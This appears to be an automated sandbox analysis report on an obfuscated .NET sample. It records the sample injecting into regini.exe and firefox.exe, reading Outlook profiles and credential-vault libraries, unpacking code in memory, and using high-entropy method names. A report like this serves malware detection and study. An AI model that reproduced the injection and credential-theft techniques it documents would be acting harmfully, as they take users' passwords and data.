                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: regini.exe, 00000007.00000002.3752723389.0000000002631000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002606000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002655000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1689456035.0000000002627000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3752723389.0000000002627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                Source: file.exeReversingLabs: Detection: 68%
                Source: file.exeVirustotal: Detection: 37%
                Source: file.exeString found in binary or memory: -Add*+
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QmkRHPDwxbW.exe, 00000005.00000002.3753745790.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3750502958.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: file.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.cs.Net Code: SC36JhK84M System.Reflection.Assembly.Load(byte[])
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.cs.Net Code: SC36JhK84M System.Reflection.Assembly.Load(byte[])
                Source: 7.2.regini.exe.322cd14.2.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.2.QmkRHPDwxbW.exe.33dcd14.1.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 8.0.QmkRHPDwxbW.exe.33dcd14.1.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.firefox.exe.2b8acd14.0.raw.unpack, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_02660434 push ecx; ret 1_2_02660442
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0266DB84 pushfd ; ret 1_2_0266DB89
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D066 push cs; retf 4_2_0040D068
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416123 push ecx; iretd 4_2_00416145
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041692E push eax; ret 4_2_00416930
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004031F0 push eax; ret 4_2_004031F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D192 push 32D5BE83h; retf 4_2_0040D19A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004082F0 push cs; ret 4_2_004082FD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004192F0 pushad ; retf 4_2_004192F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040D3DF push edx; retf 4_2_0040D3E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A09AD push ecx; mov dword ptr [esp], ecx4_2_017A09B6
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E9886 push edx; retf 5_2_034E9888
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F5797 pushad ; retf 5_2_034F5799
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E9639 push 32D5BE83h; retf 5_2_034E9641
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034E950D push cs; retf 5_2_034E950F
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F25CA push ecx; iretd 5_2_034F25EC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F25C7 push ecx; iretd 5_2_034F25EC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F2DD5 push eax; ret 5_2_034F2DD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B409AD push ecx; mov dword ptr [esp], ecx7_2_02B409B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024160FD pushad ; retf 7_2_024160FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024206C7 push edx; iretd 7_2_024206C8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024206EF push ebp; ret 7_2_024206FB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02412F30 push ecx; iretd 7_2_02412F52
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024050FD push cs; ret 7_2_0240510A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0241373B push eax; ret 7_2_0241373D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6C263 push edi; retf 7_2_02E6C265
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F1FA push 17DCBDD3h; retf 7_2_02E6F1FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F64E push 48B9A3D6h; iretd 7_2_02E6F653
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E664AB push ds; ret 7_2_02E66549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E664B8 push ds; ret 7_2_02E66549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6654A push ds; ret 7_2_02E66549
                Source: file.exeStatic PE information: section name: .text entropy: 7.558811288088065
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, bRKVLAxVgLuKVK4XDc.csHigh entropy of concatenated method names: 'bdo4PWNXhV', 'riW41sdZec', 'WO44uU5Qom', 'uZ04t9k3Bj', 'p8b45qchIg', 'mud4nYxOua', 'Tcs4f4RXIF', 'kcM4yebVlw', 'Pkg4LU5ncb', 'D1p4b4OqUQ'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, DRj7dkLtqlvEstNerM.csHigh entropy of concatenated method names: 'bahYF5yPpc', 'ISPYANGZmZ', 'glmYKZf4RE', 'BLtY3xtG6t', 'VHBYI0oogJ', 'Jb4YSx969Y', 'uT8YRSSfOA', 'CeDYB5f9I4', 'vI0YOPObxc', 'PuUYsDEjdu'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, NvV93N6nueQYstumkp.csHigh entropy of concatenated method names: 'wBXX7RKVLA', 'AgLXWuKVK4', 'XOLXGpPoAW', 'lQ2XejFp9D', 'VMuXQljcS1', 'niGXUPOEgd', 'w1t7Rh5vJ70RdybCPY', 'aLeGdGXD88pTcZRc3k', 'n8q0XdcS0jOpXltMtB', 'JenXXZdfZU'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, oxBVWtPrhilYAvO1q3.csHigh entropy of concatenated method names: 'IFrQs7RD70', 'UVsQwxOjNG', 'iA0QPJQUj7', 'ynTQ1i0kMI', 'uueQArnjCm', 'ChHQKX9hIx', 'fg5Q3pLNlj', 's4dQIvsTYr', 'sHpQS1Mjj5', 'rCXQRpgw3u'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, F0dYWAngXGa62bvg5S.csHigh entropy of concatenated method names: 'nvmpybQfVv', 'MFupb6yYrJ', 'LnXh2TdsBt', 'kuZhXvkVGv', 'fQep80nqtU', 'EVZpwlSGPT', 'HLDpkggNSO', 'KSNpP6UoRJ', 'q6np1WEPtP', 'wRspuMY9lM'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, rvds82XXmp5Lmt1XGaO.csHigh entropy of concatenated method names: 'GQedbuhZbB', 'HiOdzeE70k', 'zZZg29mEI7', 'H5ygXCkejN', 'pDNgMavkGf', 'K8Jgjf0LxP', 'uIHg6pvBEH', 'DhlgrYagg7', 'AKUgC9mNlZ', 'p1tg4RM6Xs'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, CtLxxLcOLpPoAWNQ2j.csHigh entropy of concatenated method names: 'gbHDV7iJ7L', 'VxYDaf0b62', 'xYoDxfp0cs', 'dPsDciIveM', 'tUMDQU7Vfl', 'g3pDUd7oY6', 'vpQDpJspEG', 'iFiDh3OM6c', 'ss9DYtpD2F', 'V4eDd1FKDI'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, KNWZAykLBUvM1DiVJn.csHigh entropy of concatenated method names: 'CajixT8if1', 'LJQicIeuD6', 'kbJiFRBSWZ', 'msUiAj9Wss', 'N6hi3kWGOv', 'JpaiITU0ID', 'YHOiRP5QIk', 'MXkiBMP5pi', 'lixisNX0ss', 'oDXi8O5FKU'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, UsXdQMRyGh14DOSdJh.csHigh entropy of concatenated method names: 'nCp7ComnB9', 'JTB7DPQsFF', 'Xuh7HNj804', 'I9IHbyuexk', 'pt3Hzq04He', 'y6j72GVVp8', 'Bdh7Xa5PVr', 'aly7M5F4fx', 'Bwy7jSuOE2', 'LWM76ifGri'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, hxopGhukMLFbhcLudZ.csHigh entropy of concatenated method names: 'ToString', 'XFoU86Q6ZV', 'gK9UAosgn0', 'H3YUKSQCpo', 'vc5U3mMUKf', 'P3pUIRleVh', 'DnsUSCSkaD', 'Hi8URKNQ2K', 'SOhUBrpPAQ', 'MY6UOT7kFo'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csHigh entropy of concatenated method names: 'OYujrykgRZ', 'NfkjCHvDou', 'QV9j4haGJv', 'WIIjDpL3kR', 'Onfj9lo7WK', 'b86jHqH9qD', 'CbQj7TRfW2', 'LTZjW2eQHm', 'egvjNqL7uX', 'tOqjGWJ54n'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, te1q2qAt5nMxrSFyUj.csHigh entropy of concatenated method names: 'eVcrKWT8vpqLYm6Di9g', 'OdlfgMTN6CvHi3tcoAF', 'VmX8S2TZwLRWYHbUIU2', 'gArHhOXetK', 'QpCHYivnQp', 'UQ0HdmJPLT', 'TBonwZTj10lSCRj9LQV', 'XLkG9GTbIlZY6q49vMc'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iH1ojhzvhAIrnrVGKs.csHigh entropy of concatenated method names: 'g20daBF4dj', 'nIwdxe9Ivw', 'T0Cdcd28Gy', 'DfqdFrpira', 'ewLdANLXV7', 'BoHd3jUXvF', 'a3cdI7saa3', 'Wvjdv1EIKt', 'NYmdlMQHU0', 'ilhdoZ3CSn'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, i3U78VtUiIx3AXibNC.csHigh entropy of concatenated method names: 'qu9pG11rWQ', 'yYZpe5qnOl', 'ToString', 'tB6pC3Xo9n', 'wqKp4ROCiU', 'tdVpDJQTQM', 'oeMp99cVqJ', 'wYkpHnJxmJ', 'djip7Avf9b', 'cR0pWyRmji'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, xqx5ZfOUTHmOmAqYKE.csHigh entropy of concatenated method names: 'oss7lpqqtd', 'PAO7o1gRk0', 'vhT7JUeaRh', 'ddF7V9KCNg', 'ytK7Z0Ftc3', 'vH67arqA8M', 'Vah7qJbqZF', 'XuM7x7Ky5I', 'FYq7crBKNe', 'uYX7Tfu6Vw'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, Gp9DEHTFCEIvunMulj.csHigh entropy of concatenated method names: 'zOY9ZsiIG0', 'NcW9qoEV4s', 'pLQDK781KJ', 'YA3D3oHWxT', 'juFDIMsVqL', 'DUnDS359i7', 'rJDDRbtPQM', 'GUqDB19yT3', 'LWqDOXhiXF', 'k97DshggQJ'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, ES1iiGFPOEgdtc4tH1.csHigh entropy of concatenated method names: 'emnHrgOxs3', 'Is9H4j3CvT', 'zkgH9v9JoJ', 'ut6H7BORh1', 'Qp2HWW7ufX', 'ztf95YTdxx', 'qap9n8o2Dy', 'gqU9fufnDJ', 'qlT9yEfDiZ', 'yXG9LPvS2Z'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, AFLxX1X2yYq2USp3C44.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KODd8ra2ul', 'i0udwWbEWt', 'Tb6dkiDgVH', 'SZwdPiIW7d', 'GIgd1axmo5', 'Og1duaOyGL', 'Hn4dtntDbQ'
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, IRLeuM44RxmjYC3sAi.csHigh entropy of concatenated method names: 'Dispose', 'c3TXLwYiKO', 'KJRMAOaQ3D', 'rcQBX4xq4T', 'mDDXbAQAxB', 'qPhXzi4uhP', 'ProcessDialogKey', 'YcxM2Rj7dk', 'TqlMXvEstN', 'mrMMMC0aAj'
